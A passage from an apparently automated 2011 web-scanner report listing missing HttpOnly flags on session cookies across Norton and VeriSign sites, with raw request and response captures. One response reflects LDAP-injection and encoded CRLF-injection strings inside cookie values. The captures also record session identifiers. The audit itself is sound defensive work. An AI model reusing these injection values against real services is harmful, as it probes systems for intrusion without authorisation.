Path:   /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 41047

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

10.18. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:17 GMT
Pragma: no-cache
Location: http://buy.norton.com/estore/mf/errorProductNotFound
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/
Content-Language: de-CH
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 299

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/er
...[SNIP]...

10.19. http://buy.norton.com/upgrades-renewals

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /upgrades-renewals

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /upgrades-renewals HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=0519b9aa-f875-4235-8757-656f0af7db991315604245144
Set-Cookie: JSESSIONID=vxdTTqHVp98yyfVwX91lmbQpnYvxnzf3hLdx0n14FYn99LpNvJgb!-50551110; path=/
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 397

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/up
...[SNIP]...

10.20. https://idprotect.verisign.com/toolbar/activate.v

Summary

Severity:   Low
Confidence:   Firm
Host:   https://idprotect.verisign.com
Path:   /toolbar/activate.v

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /toolbar/activate.v HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:48:59 GMT
Set-Cookie: JSESSIONID=4C45FEB27A5A8977451CA29A8776E476.moped1be-d1-tc; Path=/; Secure
Content-Type: text/html;charset=utf-8
Content-Length: 7564
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...

10.21. http://m.verisign.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m.verisign.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: m.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 22:03:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=1695809E810A8CD4C2D73D9071CB7888.tomcat2; Path=/
Location: http://m.verisign.com/home.v;jsessionid=1695809E810A8CD4C2D73D9071CB7888.tomcat2
Content-Length: 0
Content-Type: text/html


10.22. http://mbox3.offermatica.com/m2/verisign/mbox/standard

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 302 Moved Temporarily
Server: Test & Target
P3P: CP="NOI DSP CURa OUR STP COM"
Date: Fri, 09 Sep 2011 21:25:51 GMT
Location: http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31&mboxXDomainCheck=true
Set-Cookie: mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign
Content-Length: 0


10.23. https://onlinefamily.norton.com/familysafety/loginStart.fs

Summary

Severity:   Low
Confidence:   Firm
Host:   https://onlinefamily.norton.com
Path:   /familysafety/loginStart.fs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:55 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/
Set-Cookie: formVersion=1315604755623; Path=/
Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 37906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <
...[SNIP]...

10.24. https://products.verisign.com/geocenter/reseller/doregister.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://products.verisign.com
Path:   /geocenter/reseller/doregister.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /geocenter/reseller/doregister.do HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:46:18 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=BLTnTqJKyGPctfv1FdlqcJ70S5h6p0Gvlmy4hN8gznRX5SWKqb6t!1264420788; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 8588


<html>
<head>


<title>Referring Partner Code Error</title>
<link href="/geocenter/style.css" type=text/css rel="stylesheet">
<style type=
...[SNIP]...

10.25. https://products.verisign.com/geocenter/reseller/logon.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://products.verisign.com
Path:   /geocenter/reseller/logon.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /geocenter/reseller/logon.do HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:46:13 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=JLFcTqJFrTLDMrnDfsKJpnM1TKGWGdMnR63n8jNnvndRhmkDzJCZ!1264420788; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 17095


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>


<link href="/geocenter/style_verisign.css" type=text/css rel="STYLES
...[SNIP]...

10.26. https://products.verisign.com/geocenter/reseller/register.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://products.verisign.com
Path:   /geocenter/reseller/register.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /geocenter/reseller/register.do?vatCountry= HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:46:18 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=LFLdTqJKs7gRRpXLyKDGZh0GycTV9zGf0v1HCZvtSZfhRmTRGJC2!1264420788; path=/; secure
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 8588


<html>
<head>


<title>Referring Partner Code Error</title>
<link href="/geocenter/style.css" type=text/css rel="stylesheet">
<style type=
...[SNIP]...

10.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch

Summary

Severity:   Low
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/outsideSearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/outsideSearch HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:33 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

10.28. https://securitycenter.verisign.com/celp/enroll/retail

Summary

Severity:   Low
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/retail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:43:53 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/
Accept-Ranges: bytes

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

10.29. https://securitycenter.verisign.com/celp/enroll/upsell

Summary

Severity:   Low
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/upsell

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/upsell?application_locale=VRSN_US&originator=VeriSign:CELP&bundle_id=MSIECS002 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:18 GMT
Content-type: text/html;charset=UTF-8
Location: https://securitycenter.verisign.com/celp/enroll/retail
Set-Cookie: JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/
Content-Length: 303

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://securitycenter.verisign.co
...[SNIP]...

10.30. https://trust-center.verisign.com/process/retail/session_timeout

Summary

Severity:   Low
Confidence:   Firm
Host:   https://trust-center.verisign.com
Path:   /process/retail/session_timeout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /process/retail/session_timeout HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:59:40 GMT
Server: Apache
Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure
Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


10.31. http://us.norton.com/beta/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://us.norton.com
Path:   /beta/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beta/index.jsp?inid=us_hho_homepage_hero4_2012beta HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Expires: Fri, 09 Sep 2011 21:47:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:47:30 GMT
Content-Length: 24280
Connection: close
Set-Cookie: JSESSIONID=942CFE17E15760F8032358C3716740F0; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Antivirus Free Software - Spyware Free Protection | Norton Beta Center</title>
<meta http-equiv="Content-Type" cont
...[SNIP]...

10.32. http://us.norton.com/beta/overview.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://us.norton.com
Path:   /beta/overview.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beta/overview.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Expires: Fri, 09 Sep 2011 21:47:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:47:30 GMT
Connection: close
Set-Cookie: JSESSIONID=FA523A7AE741FCDE2CC540690D11D77A; Path=/


10.33. http://vipmobile.verisign.com/fpa/fpa.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /fpa/fpa.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fpa/fpa.jsp HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; JSESSIONID=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=65DC06BE96553669FB720DFCD04F8421.tomcat2; Path=/fpa
Content-Type: text/javascript
Content-Length: 108420


var urlProtocol = ('https:' == document.location.protocol ? 'https://' : 'http://');

   // Customizable variables
var hostUri = urlProtocol + "vipmobile.verisign.com/fpa";
var cookieDomain = '.v
...[SNIP]...

10.34. http://vipmobile.verisign.com/images/b_shadow.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /images/b_shadow.png

Issue detail

